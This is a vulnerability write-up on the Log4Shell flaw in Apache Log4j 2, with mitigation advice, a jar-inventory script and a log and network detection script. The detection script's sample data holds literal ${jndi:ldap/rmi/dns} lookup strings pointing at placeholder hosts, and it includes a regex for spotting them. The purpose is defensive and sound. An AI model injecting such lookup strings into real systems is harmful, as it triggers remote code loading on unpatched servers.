CVE-2021-44228 (exploited in the wild)

Log4Shell, unauthenticated RCE in Apache Log4j 2

Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Overview

CVE-2021-44228, dubbed "Log4Shell," is a critical unauthenticated remote code execution vulnerability in Apache Log4j 2, the de-facto logging library for the Java ecosystem. Disclosed in December 2021, it is considered one of the most widespread and severe vulnerabilities in computing history due to Log4j's ubiquitous presence across enterprise software, cloud services, and embedded systems.

Technical Details

Apache Log4j2 versions 2.0-beta9 through 2.14.1 contain a dangerous feature where JNDI (Java Naming and Directory Interface) lookups are performed on special ${jndi:...} patterns found within logged strings. When message lookup substitution is enabled, the library expands these patterns by contacting arbitrary LDAP, RMI, or other JNDI endpoints.

An attacker who can inject any string into an application's logs (through HTTP headers such as User-Agent or Referer, form fields, chat messages, username fields, or webhook payloads) can craft a malicious payload pointing to an attacker-controlled server. The vulnerable application will then fetch and execute arbitrary Java classes from that server.

The attack works across all JDK versions and can traverse multiple application layers, meaning even internal back-office tools can be compromised if they log data originating from untrusted sources.

Impact

The impact is catastrophic due to Log4j's presence in thousands of products including VMware vCenter, Veeam Backup & Replication, ConnectWise Automate, Atlassian Confluence/Jira, ManageEngine, Cisco IOS XR webUI, SolarWinds, and Splunk, plus countless custom Java applications.

Within 48 hours of disclosure, mass scanning began worldwide. Within one week, cryptominers, Cobalt Strike loaders, and Conti ransomware affiliates were actively exploiting the vulnerability. State-aligned threat actors including APT35, APT41, and Hafnium integrated Log4Shell into their toolchains. Confirmed breaches affected the Belgian Ministry of Defense, the Quebec government, and numerous other organizations.

Mitigation

  1. Inventory all Java workloads and identify Log4j versions by checking log4j-core-*.jar filenames
  2. Patch to version 2.17.1 or later; versions 2.15.0 and 2.16.0 had bypass vulnerabilities (CVE-2021-45046, CVE-2021-45105)
  3. Block outbound LDAP/RMI/DNS traffic from server zones to the Internet, as JNDI exfiltration can occur over DNS
  4. Network segmentation to limit lateral movement if exploitation occurs
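The inventory step above, as an added example that is not part of this write-up or of the Log4j project: a Python script that walks a directory tree, picks out log4j-core-*.jar files by filename, and reports each one against the 2.17.1 minimum recommended here. It assumes the version is encoded in the filename as Maven names it (log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar); jars repackaged inside fat jars, WARs or EARs, or renamed by a vendor, are not found this way and need a deeper scan of archive contents. The demo tree in main() is constructed for illustration.

```python
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Minimum version the write-up recommends; everything below it is reported as needing a patch.
PATCHED_MIN = "2.17.1"

# Matches log4j-core-<version>.jar, e.g. log4j-core-2.14.1.jar or log4j-core-2.0-beta9.jar.
LOG4J_CORE_RE = re.compile(r"^log4j-core-(\d+\.\d+(?:\.\d+)?(?:-[A-Za-z0-9]+)?)\.jar$")


@dataclass(frozen=True)
class Finding:
    path: str      # full path of the jar
    version: str   # version string taken from the filename
    patched: bool  # True if version >= PATCHED_MIN


def version_key(version: str) -> Tuple:
    """Turn '2.14.1' or '2.0-beta9' into a sortable tuple.

    Pre-release suffixes (beta9, rc1) sort below the matching final release,
    so '2.0-beta9' < '2.0' and '2.17.1-rc1' < '2.17.1'.
    """
    base, _, pre = version.partition("-")
    nums = [int(part) for part in base.split(".")]
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums) + ((0, pre) if pre else (1, ""))


def is_patched(version: str) -> bool:
    return version_key(version) >= version_key(PATCHED_MIN)


def assess(paths: Iterable[str]) -> List[Finding]:
    """Classify every log4j-core jar among the given paths; other files are ignored."""
    findings = []
    for path in paths:
        match = LOG4J_CORE_RE.match(os.path.basename(path))
        if not match:
            continue
        version = match.group(1)
        # -sources / -javadoc artifacts carry no executable classes; skip them.
        if version.endswith(("-sources", "-javadoc")):
            continue
        findings.append(Finding(path, version, is_patched(version)))
    return findings


def find_log4j_jars(root: str) -> List[Finding]:
    """Walk a directory tree and assess every log4j-core jar found by filename."""
    paths = (os.path.join(dirpath, name)
             for dirpath, _, names in os.walk(root)
             for name in names)
    return assess(paths)


if __name__ == "__main__":
    # Constructed demo tree (not a real deployment): one vulnerable and one patched jar.
    with tempfile.TemporaryDirectory() as demo:
        lib = os.path.join(demo, "app", "lib")
        os.makedirs(lib)
        for name in ("log4j-core-2.14.1.jar", "log4j-core-2.17.1.jar", "log4j-api-2.14.1.jar"):
            open(os.path.join(lib, name), "wb").close()
        for finding in find_log4j_jars(demo):
            status = "ok" if finding.patched else "NEEDS PATCH"
            print(f"{status:12} {finding.version:10} {finding.path}")
```

Run it as find_log4j_jars("/opt") or over a mounted image; the version comparison is deliberately its own function so the threshold can be raised when the advisory changes, and pre-release suffixes are ordered below their final release so a stray 2.17.1-rc1 is still flagged.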

Detection

Search all logs for ${jndi: patterns in User-Agent headers, Referer fields, form inputs, and application logs; this indicator covers both past and ongoing exploitation attempts. Also monitor for unusual outbound connections to LDAP (ports 389/636) or RMI (port 1099) endpoints from Java applications.
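Both detection checks from this section, as an added example that is not part of this write-up: a Python scanner that flags ${jndi: lookups in web access logs (case-insensitively, after percent-decoding, because the indicator frequently arrives URL-encoded in a query string or header) and records the JNDI scheme for triage, plus a filter over connection records that keeps outbound flows from internal hosts to LDAP or RMI ports outside the server zone. The log lines and flow records are constructed sample data with TEST-NET addresses, and "server zone" is assumed to mean RFC 1918 space.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Core indicator from the write-up: a JNDI lookup string, with the scheme captured
# so the hit can be triaged (ldap, ldaps, rmi, dns, ...). Case-insensitive.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):", re.IGNORECASE)

# Ports named in the write-up for outbound JNDI traffic.
JNDI_PORTS = {389, 636, 1099}

# Assumption: the "server zone" is RFC 1918 space; anything else counts as the Internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Hit:
    line_no: int  # 1-based index into the scanned input
    scheme: str   # JNDI scheme in lower case
    snippet: str  # decoded text starting at the lookup, for the analyst


def normalise(line: str) -> str:
    """Percent-decode up to twice, since the lookup string often arrives URL-encoded."""
    text = line
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_lines(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per ${jndi:...} occurrence in the given log lines."""
    hits = []
    for line_no, raw in enumerate(lines, start=1):
        text = normalise(raw)
        for m in JNDI_RE.finditer(text):
            hits.append(Hit(line_no, m.group("scheme").lower(), text[m.start():m.start() + 80]))
    return hits


Flow = Tuple[str, str, int]  # (src_ip, dst_ip, dst_port)


def flag_outbound(flows: Iterable[Flow]) -> List[Flow]:
    """Keep flows to LDAP/RMI ports whose destination lies outside the internal networks."""
    flagged = []
    for src, dst, dport in flows:
        dst_ip = ipaddress.ip_address(dst)
        internal = any(dst_ip in net for net in INTERNAL_NETS)
        if dport in JNDI_PORTS and not internal:
            flagged.append((src, dst, dport))
    return flagged


# Constructed sample data (not real traffic): Apache combined-format lines and flow records.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:21:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:10:21:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:22:41 +0000] "GET /search?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fx%7D HTTP/1.1" 200 88 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:10:23:00 +0000] "GET /login HTTP/1.1" 200 310 "${JNDI:dns://203.0.113.7/z}" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:24:12 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
SAMPLE_FLOWS: List[Flow] = [
    ("10.0.0.12", "10.0.0.20", 389),      # app server talking to the internal directory: expected
    ("10.0.0.12", "203.0.113.5", 389),    # app server to Internet LDAP: flag
    ("10.0.0.12", "198.51.100.3", 443),   # ordinary HTTPS egress: ignore
    ("10.0.0.12", "203.0.113.9", 1099),   # app server to Internet RMI: flag
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit.line_no}: scheme={hit.scheme} {hit.snippet}")
    for flow in flag_outbound(SAMPLE_FLOWS):
        print("suspicious outbound:", flow)
```

Feed scan_lines() a file handle or a SIEM export; the scheme field lets an analyst separate DNS-only reconnaissance from LDAP or RMI attempts, and the percent-decoding pass catches the encoded form that a plain substring search for ${jndi: misses.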